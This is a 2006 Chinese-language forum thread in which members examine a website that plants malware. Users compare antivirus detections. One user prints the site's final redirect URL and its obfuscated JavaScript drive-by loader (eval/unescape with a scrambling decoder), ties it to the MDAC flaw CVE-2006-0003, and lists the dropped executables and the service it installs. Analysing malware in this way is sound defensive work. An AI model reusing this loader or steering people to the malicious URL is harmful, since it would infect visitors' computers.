地平線的那端 ![]() | 請大家測試一下這個會植入惡意程式的網站 |
回覆 |
會員 ![]() | 回覆: 請大家測試一下這個會植入惡意程式的網站 有嗎 ....?? 還是你 M$ 沒更新..? |
回覆 |
會員 ![]() | 回覆: 請大家測試一下這個會植入惡意程式的網站 用AntiVir Free版會抓到TR/Crypt.NSAnti.Gen clamav沒發現..趨勢好像也沒發現...(希望趨勢加油一點!! ![]() 可否分享一下...這個惡意程式的特徵或該檢查哪些地方呢? |
回覆 |
會員 ![]() | 回覆: 請大家測試一下這個會植入惡意程式的網站 呃... NOD32 沒反應... 而且McAfee SiteAdvisor 說這是個安全的網站...... XP更新後漏洞沒了, 所以沒反應吧~ 不會發生下面hcchen所說的情形~ 此篇文章於 2006-11-09 01:18 AM 被 ifchen 編輯。. |
回覆 |
散人 ![]() | 回覆: 請大家測試一下這個會植入惡意程式的網站 既然是惡意網站,叫大家測試,不是很危險? ![]() |
回覆 |
會員 | 回覆: 請大家測試一下這個會植入惡意程式的網站 網站導向了很多次,並做了很多種編碼。 最後導向: [PHP] http://www.88ttg.com/j.htm [/PHP] 有興趣的可以還原下面的東東........ [PHP] <html> <head><META HTTP-EQUIV="ImageToolbar" CONTENT="No"><META NAME="MSSmartTagsPreventParsing" CONTENT="True"><META HTTP-EQUIV="Expires" CONTENT="-1"><META HTTP-EQUIV="Pragma" CONTENT="No-Cache"><SCRIPT LANGUAGE="JavaScript">eval(unescape("%66%75%6e%63%74%69%6f%6e%20%52%72%52%72%52%72%52%72%28%74%65%61%61%62%62%29%20%7b%76%61%72%20%74%74%74%6d%6d%6d%3d%22%22%3b%6c%3d%74%65%61%61%62%62%2e%6c%65%6e%67%74%68%3b%77%77%77%3d%68%68%68%68%66%66%66%66%3d%4d%61%74%68%2e%72%6f%75%6e%64%28%6c%2f%32%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%09%68%68%68%68%66%66%66%66%3d%68%68%68%68%66%66%66%66%2d%31%3b%66%6f%72%28%69%3d%30%3b%69%3c%68%68%68%68%66%66%66%66%3b%69%2b%2b%29%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%29%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%69%2b%68%68%68%68%66%66%66%66%29%3b%69%66%28%6c%3c%32%2a%77%77%77%29%20%74%74%74%6d%6d%6d%20%3d%20%74%74%74%6d%6d%6d%20%2b%20%74%65%61%61%62%62%2e%63%68%61%72%41%74%28%6c%2d%31%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%74%74%74%6d%6d%6d%29%3b%7d%3b"));</script> <body><SCRIPT LANGUAGE="JavaScript">RrRrRrRr("<CITLNUG=JvSrp\"wie(idwsdbr?reflevrw5=as;fnvgtrueAetidxf'pr'!-){lr(Ti e aede o upr pr rwe.) idwlcto=aotbak;fnto ri({lr(H.) eunfle}fnto rn(){i(.hc=2|.hc=3 eunfle i(ouetlyr){dcmn.atrEet(vn.OSDW) ouetomueonncs dcmn.notxmn=ri;ouetoslcsatnwFnto(rtr as\";ucinne({f(ouetlyr)|sd)vrqe ouetgteeto(;fqe=\" wno.id\"\"}stieu(ne(\"2)}ne(;ucindsrg)i(ouetal{ouetodasat e ucin\"eunfle)fr( ;<dcmn.mgslnt;+)z=dcmn.mgsi;.alrIg='o;};ida(;ucinwdd)wno.tts\"\"stieu(wdd),0;;wd(;ucinf6w)dcmn.oain\";46tu;eun}i(idwlcto.rtclidxf\"ie)=1{39(;fnto c({lporDt.laDt(;;ucince)cd)stieu(ce),0;;c(;fdcmn.l)ouetwie'ln e=tlsettp=tx/s\"he=epnl.s\"';/CIT<tl ei=pit>oy{ipa ![]() ![]() </html> [/PHP] 一樣是: Microsoft Windows MDAC 漏洞 - CVE-2006-0003: 作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的 RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏 洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬 下載檔案: 1.exe 2.exe 3.exe df.exe C:\Documents and Settings\{user}\Local Settings\Temp下產生 j.exe 自動執行後會出現 j1.exe 和 j2.exe發生問題xxxxxxxxxxx C:\windows下產生 winntKey.dll 32KB winnt.Dll 258KB winnt.exe C:\windows\system32下產生 WSD_SOCK32.DLL 複製和貼上功能失效 增加一個服務 O23 - Service: PigeonServer - Unknown owner - C:\WINDOWS\winnt.exe (file missing) 此篇文章於 2006-11-08 10:32 PM 被 hcchen 編輯。. |
回覆 |
會員 ![]() | 回覆: 請大家測試一下這個會植入惡意程式的網站 龜毛究竟是好還是壞? 前幾次用VBScript,這次已經用JavaScript,照理說非IE的瀏覽器應該會有反應。結果因為它的JavaScript不是用標準語法,火狐就停在那裡,什麼事也沒發生。 |
回覆 |
|
XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。